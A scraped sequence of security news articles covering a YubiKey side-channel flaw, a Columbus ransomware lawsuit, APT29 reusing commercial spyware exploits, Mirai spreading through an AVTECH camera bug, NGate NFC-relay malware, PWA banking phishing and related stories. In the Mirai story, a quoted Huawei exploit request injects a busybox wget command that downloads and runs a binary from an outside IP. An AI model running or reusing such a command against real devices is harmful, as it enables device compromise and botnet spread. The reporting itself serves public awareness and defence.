Security

yubikeys-are-vulnerable-to-cloning-attacks-thanks-to-newly-discovered-side-channel

YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel

ATTACK OF THE CLONES —

Sophisticated attack breaks security assurances of the most popular FIDO key.

YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel

Yubico

The YubiKey 5, the most widely used hardware token for two-factor authentication based on the FIDO standard, contains a cryptographic flaw that makes the finger-size device vulnerable to cloning when an attacker gains brief physical access to it, researchers said Tuesday.

The cryptographic flaw, known as a side channel, resides in a small microcontroller used in a large number of other authentication devices, including smartcards used in banking, electronic passports, and the accessing of secure areas. While the researchers have confirmed all YubiKey 5 series models can be cloned, they haven’t tested other devices using the microcontroller, such as the SLE78 made by Infineon and successor microcontrollers known as the Infineon Optiga Trust M and the Infineon Optiga TPM. The researchers suspect that any device using any of these three microcontrollers and the Infineon cryptographic library contains the same vulnerability.

Patching not possible

YubiKey-maker Yubico issued an advisory in coordination with a detailed disclosure report from NinjaLab, the security firm that reverse-engineered the YubiKey 5 series and devised the cloning attack. All YubiKeys running firmware prior to version 5.7—which was released in May and replaces the Infineon cryptolibrary with a custom one—are vulnerable. Updating key firmware on the YubiKey isn’t possible. That leaves all affected YubiKeys permanently vulnerable.

“An attacker could exploit this issue as part of a sophisticated and targeted attack to recover affected private keys,” the advisory confirmed. “The attacker would need physical possession of the YubiKey, Security Key, or YubiHSM, knowledge of the accounts they want to target and specialized equipment to perform the necessary attack. Depending on the use case, the attacker may also require additional knowledge including username, PIN, account password, or authentication key.”

Side channels are the result of clues left in physical manifestations such as electromagnetic emanations, data caches, or the time required to complete a task that leaks cryptographic secrets. In this case, the side channel is the amount of time taken during a mathematical calculation known as a modular inversion. The Infineon cryptolibrary failed to implement a common side-channel defense known as constant time as it performs modular inversion operations involving the Elliptic Curve Digital Signature Algorithm. Constant time ensures the time sensitive cryptographic operations execute is uniform rather than variable depending on the specific keys.

More precisely, the side channel is located in the Infineon implementation of the Extended Euclidean Algorithm, a method for, among other things, computing the modular inverse. By using an oscilloscope to measure the electromagnetic radiation while the token is authenticating itself, the researchers can detect tiny execution time differences that reveal a token’s ephemeral ECDSA key, also known as a nonce. Further analysis allows the researchers to extract the secret ECDSA key that underpins the entire security of the token.

In Tuesday’s report, NinjaLab co-founder Thomas Roche wrote:

In the present work, NinjaLab unveils a new side-channel vulnerability in the ECDSA implementation of Infineon 9 on any security microcontroller family of the manufacturer.This vulnerability lies in the ECDSA ephemeral key (or nonce) modular inversion, and, more precisely, in the Infineon implementation of the Extended Euclidean Algorithm (EEA for short). To our knowledge, this is the first time an implementation of the EEA is shown to be vulnerable to side-channel analysis (contrarily to the EEA binary version). The exploitation of this vulnerability is demonstrated through realistic experiments and we show that an adversary only needs to have access to the device for a few minutes. The offline phase took us about 24 hours; with more engineering work in the attack development, it would take less than one hour.

After a long phase of understanding Infineon implementation through side-channel analysis on a Feitian 10 open JavaCard smartcard, the attack is tested on a YubiKey 5Ci, a FIDO hardware token from Yubico. All YubiKey 5 Series (before the firmware update 5.7 11 of May 6th, 2024) are affected by the attack. In fact all products relying on the ECDSA of Infineon cryptographic library running on an Infineon security microcontroller are affected by the attack. We estimate that the vulnerability exists for more than 14 years in Infineon top secure chips. These chips and the vulnerable part of the cryptographic library went through about 80 CC certification evaluations of level AVA VAN 4 (for TPMs) or AVA VAN 5 (for the others) from 2010 to 2024 (and a bit less than 30 certificate maintenances).

YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel Read More »

city-of-columbus-sues-man-after-he-discloses-severity-of-ransomware-attack

City of Columbus sues man after he discloses severity of ransomware attack

WHISTLEBLOWER IN LEGAL CROSSHAIRS —

Mayor said data was unusable to criminals; researcher proved otherwise.

A ransom note is plastered across a laptop monitor.

A judge in Ohio has issued a temporary restraining order against a security researcher who presented evidence that a recent ransomware attack on the city of Columbus scooped up reams of sensitive personal information, contradicting claims made by city officials.

The order, issued by a judge in Ohio’s Franklin County, came after the city of Columbus fell victim to a ransomware attack on July 18 that siphoned 6.5 terabytes of the city’s data. A ransomware group known as Rhysida took credit for the attack and offered to auction off the data with a starting bid of about $1.7 million in bitcoin. On August 8, after the auction failed to find a bidder, Rhysida released what it said was about 45 percent of the stolen data on the group’s dark web site, which is accessible to anyone with a TOR browser.

Dark web not readily available to public—really?

Columbus Mayor Andrew Ginther said on August 13 that a “breakthrough” in the city’s forensic investigation of the breach found that the sensitive files Rhysida obtained were either encrypted or corrupted, making them “unusable” to the thieves. Ginther went on to say the data’s lack of integrity was likely the reason the ransomware group had been unable to auction off the data.

Shortly after Ginther made his remarks, security researcher David Leroy Ross contacted local news outlets and presented evidence that showed the data Rhysida published was fully intact and contained highly sensitive information regarding city employees and residents. Ross, who uses the alias Connor Goodwolf, presented screenshots and other data that showed the files Rhysida had posted included names from domestic violence cases and Social Security numbers for police officers and crime victims. Some of the data spanned years.

On Thursday, the city of Columbus sued Ross for alleged damages for criminal acts, invasion of privacy, negligence, and civil conversion. The lawsuit claimed that downloading documents from a dark web site run by ransomware attackers amounted to him “interacting” with them and required special expertise and tools. The suit went on to challenge Ross alerting reporters to the information, which ii claimed would not be easily obtained by others.

“Only individuals willing to navigate and interact with the criminal element on the dark web, who also have the computer expertise and tools necessary to download data from the dark web, would be able to do so,” city attorneys wrote. “The dark web-posted data is not readily available for public consumption. Defendant is making it so.”

The same day, a Franklin County judge granted the city’s motion for a temporary restraining order against Ross. It bars the researcher “from accessing, and/or downloading, and/or disseminating” any city files that were posted to the dark web. The motion was made and granted “ex parte,” meaning in secret before Ross was informed of it or had an opportunity to present his case.

In a press conference Thursday, Columbus City Attorney Zach Klein defended his decision to sue Ross and obtain the restraining order.

“This is not about freedom of speech or whistleblowing,” he said. “This is about the downloading and disclosure of stolen criminal investigatory records. This effect is to get [Ross] to stop downloading and disclosing stolen criminal records to protect public safety.”

The Columbus city attorney’s office didn’t respond to questions sent by email. It did provide the following statement:

The lawsuit filed by the City of Columbus pertains to stolen data that Mr. Ross downloaded from the dark web to his own, local device and disseminated to the media. In fact, several outlets used the stolen data provided by Ross to go door-to-door and contact individuals using names and addresses contained within the stolen data. As has now been extensively reported, Mr. Ross also showed multiple news outlets stolen, confidential data belonging to the City which he claims reveal the identities of undercover police officers and crime victims as well as evidence from active criminal investigations. Sharing this stolen data threatens public safety and the integrity of the investigations. The temporary restraining order granted by the Court prohibits Mr. Ross from disseminating any of the City’s stolen data. Mr. Ross is still free to speak about the cyber incident and even describe what kind of data is on the dark web—he just cannot disseminate that data.

Attempts to reach Ross for comment were unsuccessful. Email sent to the Columbus mayor’s office went unanswered.

A screenshot showing the Rhysida dark web site.

Enlarge / A screenshot showing the Rhysida dark web site.

As shown above in the screenshot of the Rhysida dark web site on Friday morning, the sensitive data remains available to anyone who looks for it. Friday’s order may bar Ross from accessing the data or disseminating it to reporters, but it has no effect on those who plan to use the data for malicious purposes.

City of Columbus sues man after he discloses severity of ransomware attack Read More »

commercial-spyware-vendor-exploits-used-by-kremlin-backed-hackers,-google-says

Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says

MERCHANTS OF HACKING —

Findings undercut pledges of NSO Group and Intgellexa their wares won’t be abused.

Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says

Getty Images

Critics of spyware and exploit sellers have long warned that the advanced hacking sold by commercial surveillance vendors (CSVs) represents a worldwide danger because they inevitably find their way into the hands of malicious parties, even when the CSVs promise they will be used only to target known criminals. On Thursday, Google analysts presented evidence bolstering the critique after finding that spies working on behalf of the Kremlin used exploits that are “identical or strikingly similar” to those sold by spyware makers Intellexa and NSO Group.

The hacking outfit, tracked under names including APT29, Cozy Bear, and Midnight Blizzard, is widely assessed to work on behalf of Russia’s Foreign Intelligence Service, or the SVR. Researchers with Google’s Threat Analysis Group, which tracks nation-state hacking, said Thursday that they observed APT29 using exploits identical or closely identical to those first used by commercial exploit sellers NSO Group of Israel and Intellexa of Ireland. In both cases, the Commercial Surveillance Vendors’ exploits were first used as zero-days, meaning when the vulnerabilities weren’t publicly known and no patch was available.

Identical or strikingly similar

Once patches became available for the vulnerabilities, TAG said, APT29 used the exploits in watering hole attacks, which infect targets by surreptitiously planting exploits on sites they’re known to frequent. TAG said APT29 used the exploits as n-days, which target vulnerabilities that have recently been fixed but not yet widely installed by users.

“In each iteration of the watering hole campaigns, the attackers used exploits that were identical or strikingly similar to exploits from CSVs, Intellexa, and NSO Group,” TAG’s Clement Lecigne wrote. “We do not know how the attackers acquired these exploits. What is clear is that APT actors are using n-day exploits that were originally used as 0-days by CSVs.”

In one case, Lecigne said, TAG observed APT29 compromising the Mongolian government sites mfa.gov[.]mn and cabinet.gov[.]mn and planting a link that loaded code exploiting CVE-2023-41993, a critical flaw in the WebKit browser engine. The Russian operatives used the vulnerability, loaded onto the sites in November, to steal browser cookies for accessing online accounts of targets they hoped to compromise. The Google analyst said that the APT29 exploit “used the exact same trigger” as an exploit Intellexa used in September 2023, before CVE-2023-41993 had been fixed.

Lucigne provided the following image showing a side-by-side comparison of the code used in each attack.

A side-by-side comparison of code used by APT29 in November 2023 and Intellexa in September of that year.

Enlarge / A side-by-side comparison of code used by APT29 in November 2023 and Intellexa in September of that year.

Google TAG

APT29 used the same exploit again in February of this year in a watering hole attack on the Mongolian government website mga.gov[.]mn.

In July 2024, APT29 planted a new cookie-stealing attack on mga.gov[.]me. It exploited CVE-2024-5274 and CVE-2024-4671, two n-day vulnerabilities in Google Chrome. Lucigne said APT29’s CVE-2024-5274 exploit was a slightly modified version of that NSO Group used in May 2024 when it was still a zero-day. The exploit for CVE-2024-4671, meanwhile, contained many similarities to CVE-2021-37973, an exploit Intellexa had previously used to evade Chrome sandbox protections.

The timeline of the attacks is illustrated below:

Google TAG

As noted earlier, it’s unclear how APT29 would have obtained the exploits. Possibilities include: malicious insiders at the CSVs or brokers who worked with the CSVs, hacks that stole the code, or outright purchases. Both companies defend their business by promising to sell exploits only to governments of countries deemed to have good world standing. The evidence unearthed by TAG suggests that despite those assurances, the exploits are finding their way into the hands of government-backed hacking groups.

“While we are uncertain how suspected APT29 actors acquired these exploits, our research underscores the extent to which exploits first developed by the commercial surveillance industry are proliferated to dangerous threat actors,” Lucigne wrote.

Commercial spyware vendor exploits used by Kremlin-backed hackers, Google says Read More »

unpatchable-0-day-in-surveillance-cam-is-being-exploited-to-install-mirai

Unpatchable 0-day in surveillance cam is being exploited to install Mirai

MIRAI STRIKES AGAIN —

Vulnerability is easy to exploit and allows attackers to remotely execute commands.

The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

Malicious hackers are exploiting a critical vulnerability in a widely used security camera to spread Mirai, a family of malware that wrangles infected Internet of Things devices into large networks for use in attacks that take down websites and other Internet-connected devices.

The attacks target the AVM1203, a surveillance device from Taiwan-based manufacturer AVTECH, network security provider Akamai said Wednesday. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, tracked as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day.

That time a ragtag army shook the Internet

Akamai said that the attackers are exploiting the vulnerability so they can install a variant of Mirai, which arrived in September 2016 when a botnet of infected devices took down cybersecurity news site Krebs on Security. Mirai contained functionality that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to wage distributed denial-of-service attacks of record-setting sizes. In the weeks that followed, the Mirai botnet delivered similar attacks on Internet service providers and other targets. One such attack, against dynamic domain name provider Dyn paralyzed vast swaths of the Internet.

Complicating attempts to contain Mirai, its creators released the malware to the public, a move that allowed virtually anyone to create their own botnets that delivered DDoSes of once-unimaginable size.

Kyle Lefton, a security researcher with Akamai’s Security Intelligence and Response Team, said in an email that it has observed the threat actor behind the attacks perform DDoS attacks against “various organizations,” which he didn’t name or describe further. So far, the team hasn’t seen any indication the threat actors are monitoring video feeds or using the infected cameras for other purposes.

Akamai detected the activity using a “honeypot” of devices that mimic the cameras on the open Internet to observe any attacks that target them. The technique doesn’t allow the researchers to measure the botnet’s size. The US Cybersecurity and Infrastructure Security Agency warned of the vulnerability earlier this month.

The technique, however, has allowed Akamai to capture the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019 when exploit code became public. The zero-day resides in the “brightness argument in the ‘action=’ parameter” and allows for command injection, researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, wasn’t formally recognized until this month, with the publishing of CVE-2024-7029.

Wednesday’s post went on to say:

How does it work?

This vulnerability was originally discovered by examining our honeypot logs. Figure 1 shows the decoded URL for clarity.

Decoded payload

Fig. 1: Decoded payload body of the exploit attempts

Enlarge / Fig. 1: Decoded payload body of the exploit attempts

Akamai

Fig. 1: Decoded payload body of the exploit attempts

The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).

Fig. 2: PoC of the exploit

Enlarge / Fig. 2: PoC of the exploit

Akamai

What could happen?

In the exploit examples we observed, essentially what happened is this: The exploit of this vulnerability allows an attacker to execute remote code on a target system.

Figure 3 is an example of a threat actor exploiting this flaw to download and run a JavaScript file to fetch and load their main malware payload. Similar to many other botnets, this one is also spreading a variant of Mirai malware to its targets.

Fig. 3: Strings from the JavaScript downloader

Enlarge / Fig. 3: Strings from the JavaScript downloader

Akamai

In this instance, the botnet is likely using the Corona Mirai variant, which has been referenced by other vendors as early as 2020 in relation to the COVID-19 virus.

Upon execution, the malware connects to a large number of hosts through Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).

Fig. 4: Execution of malware showing output to console

Enlarge / Fig. 4: Execution of malware showing output to console

Akamai

Static analysis of the strings in the malware samples shows targeting of the path /ctrlt/DeviceUpgrade_1 in an attempt to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1    Content-Length: 430    Connection: keep-alive    Accept: */Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="https://arstechnica.com/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"      $(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)  

The botnet also targeted several other vulnerabilities including a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities exploited in the wild several times, and they continue to be successful.

Given that this camera model is no longer supported, the best course of action for anyone using one is to replace it. As with all Internet-connected devices, IoT devices should never be accessible using the default credentials that shipped with them.

Unpatchable 0-day in surveillance cam is being exploited to install Mirai Read More »

shocker:-french-make-surprise-arrest-of-telegram-founder-at-paris-airport

Shocker: French make surprise arrest of Telegram founder at Paris airport

quelle surprise —

Lack of moderation on Telegram claimed to be reason for arrest.

Pavel Durov, Telegram founder and former CEO of Vkontakte, in happier (and younger) days.

Pavel Durov, Telegram founder and former CEO of Vkontakte, in happier (and younger) days.

Late this afternoon at a Parisian airport, French authorities detained Pavel Durov, the founder of the Telegram messaging/publication service. They are allegedly planning to hit him tomorrow with serious charges related to abetting terrorism, fraud, money laundering, and crimes against children, all of it apparently stemming from a near-total lack of moderation on Telegram. According to French authorities, thanks to its encryption and support for crypto, Telegram has become the new top tool for organized crime.

The French outlet TF1 had the news first from sources within the investigation. (Reuters and CNN have since run stories as well.) Their source said, “Pavel Durov will definitely end up in pretrial detention. On his platform, he allowed an incalculable number of offenses and crimes to be committed, which he does nothing to moderate nor does he cooperate.”

Durov is a 39-year-old who gained a fortune by building VKontakte, a Russian version of Facebook, before being forced out of his company by the Kremlin. He left Russia and went on to start Telegram, which became widely popular, especially in Europe. He was arrested today when his private plane flew from Azerbaijan to Paris’s Le Bourget Airport.

Telegram has become a crucial news outlet for Russians, as it is one of the few uncensored ways to hear non-Kremlin propaganda from within Russia. It has also become the top outlet for nationalistic Russian “milbloggers” writing about the Ukraine war. Durov’s arrest has already led to outright panic among many of them, in part due to secrets it might reveal—but also because it is commonly used by Russian forces to communicate.

As Rob Lee, a senior fellow at the Foreign Policy Research Institute, noted tonight, “A popular Russian channel says that Telegram is also used by Russian forces to communicate, and that if Western intelligence services gain access to it, they could obtain sensitive information about the Russian military.”

Right wing and crypto influencers are likewise angry over the arrest, writing things like, “This is a serious attack on freedom. Today, they target an app that promotes liberty tomorrow, they will go after DeFi. If you claim to support crypto, you must show your support #FreeDurov it’s time for digital resistance.”

Durov appears to be an old-school cyber-libertarian who believes in privacy and encryption. His arrest will certainly resonate in America, which has seen a similar debate over how much online services should cooperate with law enforcement. The FBI, for instance, has occasionally warned that end-to-end encryption will result in a “going dark” problem in which crime simply disappears from their view, and the US has seen repeated attempts to legislate backdoors into encryption systems. Those have all been defeated, however, and civil liberties advocates and techies generally note that creating backdoors makes such systems fundamentally insecure. The global debate over crime, encryption, civil liberties, and messaging apps is sure to heat up with Durov’s arrest.

Shocker: French make surprise arrest of Telegram founder at Paris airport Read More »

microsoft-to-host-security-summit-after-crowdstrike-disaster

Microsoft to host security summit after CrowdStrike disaster

Bugging out —

Redmond wants to improve the resilience of Windows to buggy software.

Photo of a Windows BSOD

Microsoft is stepping up its plans to make Windows more resilient to buggy software after a botched CrowdStrike update took down millions of PCs and servers in a global IT outage.

The tech giant has in the past month intensified talks with partners about adapting the security procedures around its operating system to better withstand the kind of software error that crashed 8.5 million Windows devices on July 19.

Critics say that any changes by Microsoft would amount to a concession of shortcomings in Windows’ handling of third-party security software that could have been addressed sooner.

Yet they would also prove controversial among security vendors that would have to make radical changes to their products, and force many Microsoft customers to adapt their software.

Last month’s outages—which are estimated to have caused billions of dollars in damages after grounding thousands of flights and disrupting hospital appointments worldwide—heightened scrutiny from regulators and business leaders over the extent of access that third-party software vendors have to the core, or kernel, of Windows operating systems.

Microsoft will host a summit next month for government representatives and cyber security companies, including CrowdStrike, to “discuss concrete steps we will all take to improve security and resiliency for our joint customers,” Microsoft said on Friday.

The gathering will take place on September 10 at Microsoft’s headquarters near Seattle, it said in a blog post.

Bugs in the kernel can quickly crash an entire operating system, triggering the millions of “blue screens of death” that appeared around the globe after CrowdStrike’s faulty software update was sent out to clients’ devices.

Microsoft told the Financial Times it was considering several options to make its systems more stable and had not ruled out completely blocking access to the Windows kernel—an option some rivals fear would put their software at a disadvantage to the company’s internal security product, Microsoft Defender.

“All of the competitors are concerned that [Microsoft] will use this to prefer their own products over third-party alternatives,” said Ryan Kalember, head of cyber security strategy at Proofpoint.

Microsoft may also demand new testing procedures from cyber security vendors rather than adapting the Windows system itself.

Apple, which was not hit by the outages, blocks all third-party providers from accessing the kernel of its MacOS operating system, forcing them to operate in the more limited “user-mode.”

Microsoft has previously said it could not do the same, after coming to an understanding with the European Commission in 2009 that it would give third parties the same access to its systems as that for Microsoft Defender.

Some experts said, however, that this voluntary commitment to the EU had not tied Microsoft’s hands in the way it claimed, arguing that the company had always been free to make the changes now under consideration.

“These are technical decisions of Microsoft that were not part of [the arrangement],” said Thomas Graf, a partner at Cleary Gottlieb in Brussels who was involved in the case.

“The text [of the understanding] does not require them to give access to the kernel,” added AJ Grotto, a former senior director for cyber security policy at the White House.

Grotto said Microsoft shared some of the blame for the July disruption since the outages would not have been possible without its decision to allow access to the kernel.

Nevertheless, while it might boost a system’s resilience, blocking kernel access could also bring “real trade-offs” for the compatibility with other software that had made Windows so popular among business customers, Forrester analyst Allie Mellen said.

“That would be a fundamental shift for Microsoft’s philosophy and business model,” she added.

Operating exclusively outside the kernel may lower the risk of triggering mass outages but it was also “very limiting” for security vendors and could make their products “less effective” against hackers, Mellen added.

Operating within the kernel gave security companies more information about potential threats and enabled their defensive tools to activate before malware could take hold, she added.

An alternative option could be to replicate the model used by the open-source operating system Linux, which uses a filtering mechanism that creates a segregated environment within the kernel in which software, including cyber defense tools, can run.

But the complexity of overhauling how other security software works with Windows means that any changes will be hard for regulators to police and Microsoft will have strong incentives to favor its own products, rivals said.

It “sounds good on paper, but the devil is in the details,” said Matthew Prince, chief executive of digital services group Cloudflare.

© 2024 The Financial Times Ltd. All rights reserved Not to be redistributed, copied, or modified in any way.

Microsoft to host security summit after CrowdStrike disaster Read More »

after-cybersecurity-lab-wouldn’t-use-av-software,-us-accuses-georgia-tech-of-fraud

After cybersecurity lab wouldn’t use AV software, US accuses Georgia Tech of fraud

Photo of Georgia Tech

Georgia Tech

Dr. Emmanouil “Manos” Antonakakis runs a Georgia Tech cybersecurity lab and has attracted millions of dollars in the last few years from the US government for Department of Defense research projects like “Rhamnousia: Attributing Cyber Actors Through Tensor Decomposition and Novel Data Acquisition.”

The government yesterday sued Georgia Tech in federal court, singling out Antonakakis and claiming that neither he nor Georgia Tech followed basic (and required) security protocols for years, knew they were not in compliance with such protocols, and then submitted invoices for their DoD projects anyway. (Read the complaint.) The government claims this is fraud:

At bottom, DoD paid for military technology that Defendants stored in an environment that was not secure from unauthorized disclosure, and Defendants failed to even monitor for breaches so that they and DoD could be alerted if information was compromised. What DoD received for its funds was of diminished or no value, not the benefit of its bargain.

AV hate

Given the nature of his work for DoD, Antonakakis and his lab are required to abide by many sets of security rules, including those outlined in NIST Special Publication 800–171, “Protecting Controlled Unclassified Information in Nonfederal Information Systems and Organizations.”

One of the rules says that machines storing or accessing such “controlled unclassified information” need to have endpoint antivirus software installed. But according to the US government, Antonakakis really, really doesn’t like putting AV detection software on his lab’s machines.

Georgia Tech admins asked him to comply with the requirement, but according to an internal 2019 email, Antonakakis “wasn’t receptive to such a suggestion.” In a follow-up email, Antonakakis himself said that “endpoint [antivirus] agent is a nonstarter.”

According to the government, “Other than Dr. Antonakakis’s opposition, there was nothing preventing the lab from running antivirus protection. Dr. Antonakakis simply did not want to run it.”

The IT director for Antonakakis’ lab was allowed to use other “mitigating measures” instead, such as relying on the school’s firewall for additional security. The IT director said that he thought Georgia Tech ran antivirus scans from its network. However, this “assumption” turned out to be completely wrong; the school’s network “has never provided” antivirus protection and, even if it had, the lab used laptops that were regularly taken outside the network perimeter.

The school realized after some time that the lab was not in compliance with the DoD contract rules, so an administrator decided to “suspend invoicing” on the lab’s contracts so that the school would not be charged with filing false claims.

According to the government, “Within a few days of the invoicing for his contracts being suspended, Dr. Antonakakis relented on his years-long opposition to the installation of antivirus software in the Astrolavos Lab. Georgia Tech’s standard antivirus software was installed throughout the lab.”

But, says the government, the school never acknowledged that it had been out of compliance for some time and that it had filed numerous invoices while noncompliant. In the government’s telling, this is fraud.

After cybersecurity lab wouldn’t use AV software, US accuses Georgia Tech of fraud Read More »

android-malware-steals-payment-card-data-using-previously-unseen-technique

Android malware steals payment card data using previously unseen technique

NEW ATTACK SCENARIO —

Attacker then emulates the card and makes withdrawals or payments from victim’s account.

High angle shot of female hand inserting her bank card into automatic cash machine in the city. Withdrawing money, paying bills, checking account balances and make a bank transfer. Privacy protection, internet and mobile banking security concept

Newly discovered Android malware steals payment card data using an infected device’s NFC reader and relays it to attackers, a novel technique that effectively clones the card so it can be used at ATMs or point-of-sale terminals, security firm ESET said.

ESET researchers have named the malware NGate because it incorporates NFCGate, an open source tool for capturing, analyzing, or altering NFC traffic. Short for Near-Field Communication, NFC is a protocol that allows two devices to wirelessly communicate over short distances.

New Android attack scenario

“This is a new Android attack scenario, and it is the first time we have seen Android malware with this capability being used in the wild,” ESET researcher Lukas Stefanko said in a video demonstrating the discovery. “NGate malware can relay NFC data from a victim’s card through a compromised device to an attacker’s smartphone, which is then able to emulate the card and withdraw money from an ATM.”

Lukas Stefanko—Unmasking NGate.

The malware was installed through traditional phishing scenarios, such as the attacker messaging targets and tricking them into installing NGate from short-lived domains that impersonated the banks or official mobile banking apps available on Google Play. Masquerading as a legitimate app for a target’s bank, NGate prompts the user to enter the banking client ID, date of birth, and the PIN code corresponding to the card. The app goes on to ask the user to turn on NFC and to scan the card.

ESET said it discovered NGate being used against three Czech banks starting in November and identified six separate NGate apps circulating between then and March of this year. Some of the apps used in later months of the campaign came in the form of PWAs, short for Progressive Web Apps, which as reported Thursday can be installed on both Android and iOS devices even when settings (mandatory on iOS) prevent the installation of apps available from non-official sources.

The most likely reason the NGate campaign ended in March, ESET said, was the arrest by Czech police of a 22-year-old they said they caught wearing a mask while withdrawing money from ATMs in Prague. Investigators said the suspect had “devised a new way to con people out of money” using a scheme that sounds identical to the one involving NGate.

Stefanko and fellow ESET researcher Jakub Osmani explained how the attack worked:

The announcement by the Czech police revealed the attack scenario started with the attackers sending SMS messages to potential victims about a tax return, including a link to a phishing website impersonating banks. These links most likely led to malicious PWAs. Once the victim installed the app and inserted their credentials, the attacker gained access to the victim’s account. Then the attacker called the victim, pretending to be a bank employee. The victim was informed that their account had been compromised, likely due to the earlier text message. The attacker was actually telling the truth – the victim’s account was compromised, but this truth then led to another lie.

To “protect” their funds, the victim was requested to change their PIN and verify their banking card using a mobile app – NGate malware. A link to download NGate was sent via SMS. We suspect that within the NGate app, the victims would enter their old PIN to create a new one and place their card at the back of their smartphone to verify or apply the change.

Since the attacker already had access to the compromised account, they could change the withdrawal limits. If the NFC relay method didn’t work, they could simply transfer the funds to another account. However, using NGate makes it easier for the attacker to access the victim’s funds without leaving traces back to the attacker’s own bank account. A diagram of the attack sequence is shown in Figure 6.

NGate attack overview.

Enlarge / NGate attack overview.

ESET

The researchers said NGate or apps similar to it could be used in other scenarios, such as cloning some smart cards used for other purposes. The attack would work by copying the unique ID of the NFC tag, abbreviated as UID.

“During our testing, we successfully relayed the UID from a MIFARE Classic 1K tag, which is typically used for public transport tickets, ID badges, membership or student cards, and similar use cases,” the researchers wrote. “Using NFCGate, it’s possible to perform an NFC relay attack to read an NFC token in one location and, in real time, access premises in a different location by emulating its UID, as shown in Figure 7.”

Figure 7. Android smartphone (right) that read and relayed an external NFC token’s UID to another device (left).

Enlarge / Figure 7. Android smartphone (right) that read and relayed an external NFC token’s UID to another device (left).

ESET

The cloning could all occur in situations where the attacker has physical access to a card or is able to briefly read a card in unattended purses, wallets, backpacks, or smartphone cases holding cards. To perform and emulate such attacks requires the attacker to have a rooted and customized Android device. Phones that were infected by NGate didn’t have this requirement.

Android malware steals payment card data using previously unseen technique Read More »

novel-technique-allows-malicious-apps-to-escape-ios-and-android-guardrails

Novel technique allows malicious apps to escape iOS and Android guardrails

NOW YOU KNOW —

Web-based apps escape iOS “Walled Garden” and Android side-loading protections.

An image illustrating a phone infected with malware

Getty Images

Phishers are using a novel technique to trick iOS and Android users into installing malicious apps that bypass safety guardrails built by both Apple and Google to prevent unauthorized apps.

Both mobile operating systems employ mechanisms designed to help users steer clear of apps that steal their personal information, passwords, or other sensitive data. iOS bars the installation of all apps other than those available in its App Store, an approach widely known as the Walled Garden. Android, meanwhile, is set by default to allow only apps available in Google Play. Sideloading—or the installation of apps from other markets—must be manually allowed, something Google warns against.

When native apps aren’t

Phishing campaigns making the rounds over the past nine months are using previously unseen ways to workaround these protections. The objective is to trick targets into installing a malicious app that masquerades as an official one from the targets’ bank. Once installed, the malicious app steals account credentials and sends them to the attacker in real time over Telegram.

“This technique is noteworthy because it installs a phishing application from a third-party website without the user having to allow third-party app installation,” Jakub Osmani, an analyst with security firm ESET, wrote Tuesday. “For iOS users, such an action might break any ‘walled garden’ assumptions about security. On Android, this could result in the silent installation of a special kind of APK, which on further inspection even appears to be installed from the Google Play store.”

The novel method involves enticing targets to install a special type of app known as a Progressive Web App. These apps rely solely on Web standards to render functionalities that have the feel and behavior of a native app, without the restrictions that come with them. The reliance on Web standards means PWAs, as they’re abbreviated, will in theory work on any platform running a standards-compliant browser, making them work equally well on iOS and Android. Once installed, users can add PWAs to their home screen, giving them a striking similarity to native apps.

While PWAs can apply to both iOS and Android, Osmani’s post uses PWA to apply to iOS apps and WebAPK to Android apps.

Installed phishing PWA (left) and real banking app (right).

Enlarge / Installed phishing PWA (left) and real banking app (right).

ESET

Comparison between an installed phishing WebAPK (left) and real banking app (right).

Enlarge / Comparison between an installed phishing WebAPK (left) and real banking app (right).

ESET

The attack begins with a message sent either by text message, automated call, or through a malicious ad on Facebook or Instagram. When targets click on the link in the scam message, they open a page that looks similar to the App Store or Google Play.

Example of a malicious advertisement used in these campaigns.

Example of a malicious advertisement used in these campaigns.

ESET

Phishing landing page imitating Google Play.

Phishing landing page imitating Google Play.

ESET

ESET’s Osmani continued:

From here victims are asked to install a “new version” of the banking application; an example of this can be seen in Figure 2. Depending on the campaign, clicking on the install/update button launches the installation of a malicious application from the website, directly on the victim’s phone, either in the form of a WebAPK (for Android users only), or as a PWA for iOS and Android users (if the campaign is not WebAPK based). This crucial installation step bypasses traditional browser warnings of “installing unknown apps”: this is the default behavior of Chrome’s WebAPK technology, which is abused by the attackers.

Example copycat installation page.

Example copycat installation page.

ESET

The process is a little different for iOS users, as an animated pop-up instructs victims how to add the phishing PWA to their home screen (see Figure 3). The pop-up copies the look of native iOS prompts. In the end, even iOS users are not warned about adding a potentially harmful app to their phone.

Figure 3 iOS pop-up instructions after clicking

Figure 3 iOS pop-up instructions after clicking “Install” (credit: Michal Bláha)

ESET

After installation, victims are prompted to submit their Internet banking credentials to access their account via the new mobile banking app. All submitted information is sent to the attackers’ C&C servers.

The technique is made all the more effective because application information associated with the WebAPKs will show they were installed from Google Play and have been assigned no system privileges.

WebAPK info menu—notice the

WebAPK info menu—notice the “No Permissions” at the top and “App details in store” section at the bottom.

ESET

So far, ESET is aware of the technique being used against customers of banks mostly in Czechia and less so in Hungary and Georgia. The attacks used two distinct command-and-control infrastructures, an indication that two different threat groups are using the technique.

“We expect more copycat applications to be created and distributed, since after installation it is difficult to separate the legitimate apps from the phishing ones,” Osmani said.

